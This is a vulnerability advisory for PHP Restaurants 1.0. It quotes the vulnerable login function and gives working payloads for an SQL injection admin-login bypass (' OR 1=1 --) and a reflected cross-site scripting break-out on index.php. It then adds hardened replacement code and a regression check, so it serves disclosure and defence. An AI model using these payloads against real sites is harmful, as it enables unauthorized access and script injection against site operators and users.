PHP Restaurants 1.0 SQL Injection / Cross Site Scripting
PHP Restaurants version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass and a cross site scripting vulnerability. Original discovery of SQL injection in this version is attributed to Nefrit ID in February of 2022.
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0

functions.php

    function login(){
        global $conn;
        $email = $_POST['email'];
        $pw = $_POST['password'];
        // <-- there is no filter to secure the SQL query params [email][password]
        $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` ='".md5($pw)."'";
        $result = $conn->query($sql);
        if ($result->num_rows > 0) {
            while($row = $result->fetch_assoc()) {
                setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
                header('location: index.php');
            }
        } else {
            header('location: login.php?m=Wrong Password');
        }
    }

Login bypass at the admin page /rest1/admin/login.php
email & password : ' OR 1=1 --   <-- add a [space] at the end of the payload

Cross site scripting on the main page /index.php

    xhttp.open("GET", "functions.php?f=getRestaurants<?php if(isset($_GET['search'])) echo '&search='.$_GET['search']; ?> ", true);   <-- here we can insert our XSS payload
    xhttp.send();
    </script>   <-- when you insert your payload, don't forget to add </script>, like:

xss payload : </script><img onerror=alert(1) src=a>
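As an added defensive counterpart (this is not code from the advisory or from the jcwebhole project), the two code paths above rewritten so that neither the quote-based injection in login() nor the </script> break-out in index.php works. It assumes $conn is a mysqli connection as in the original, that the users table's password column has been migrated from md5() output to password_hash() output (md5 is not a password hash), and that a PHP session replaces the forgeable uid cookie; the names login_hardened and restaurants_url are chosen here for illustration.

```php
<?php
// Added hardening example, not the project's own code.
// Assumes: $conn is a mysqli connection (as in the advisory) and
// users.password holds password_hash() output rather than md5().

function login_hardened(mysqli $conn): void
{
    $email = $_POST['email'] ?? '';
    $pw    = $_POST['password'] ?? '';

    // Parameterised query: user input is bound as data, never spliced into
    // the SQL text, so ' OR 1=1 -- is only a string compared to the column.
    $stmt = $conn->prepare('SELECT `id`, `password` FROM `users` WHERE `email` = ? LIMIT 1');
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Verify against a dummy hash when the email is unknown so the failure
    // path costs the same time and does not reveal which emails exist.
    $hash = $row['password'] ?? password_hash('dummy-password', PASSWORD_DEFAULT);
    if ($row === null || !password_verify($pw, $hash)) {
        header('Location: login.php?m=' . urlencode('Wrong Password'));
        exit;
    }

    // Server-side session instead of a client-settable 'uid' cookie.
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    session_regenerate_id(true);
    $_SESSION['uid'] = (int) $row['id'];
    header('Location: index.php');
    exit;
}

// index.php: build the request URL on the server and hand it to JavaScript
// as a JSON string literal. http_build_query() percent-encodes the search
// value, and the JSON_HEX_* flags encode < > & ' " so the emitted literal
// can never contain a raw </script> or terminate the quoted string.
function restaurants_url(?string $search): string
{
    $query = ['f' => 'getRestaurants'];
    if ($search !== null && $search !== '') {
        $query['search'] = $search;   // encoded by http_build_query()
    }
    return 'functions.php?' . http_build_query($query);
}

$jsUrl = json_encode(
    restaurants_url($_GET['search'] ?? null),
    JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
);
?>
<script>
    var xhttp = new XMLHttpRequest();
    xhttp.open("GET", <?php echo $jsUrl; ?>, true);
    xhttp.send();
</script>
```

With this change the advisory's payload </script><img onerror=alert(1) src=a> reaches the page only as the percent-encoded query value %3C%2Fscript%3E%3Cimg+onerror%3Dalert%281%29+src%3Da%3E inside a JSON string, and the ' OR 1=1 -- credential is looked up verbatim as an email address and fails password_verify(). A quick regression check for the SQL side is to submit that credential to the admin login and confirm the response is the Wrong Password redirect rather than a session.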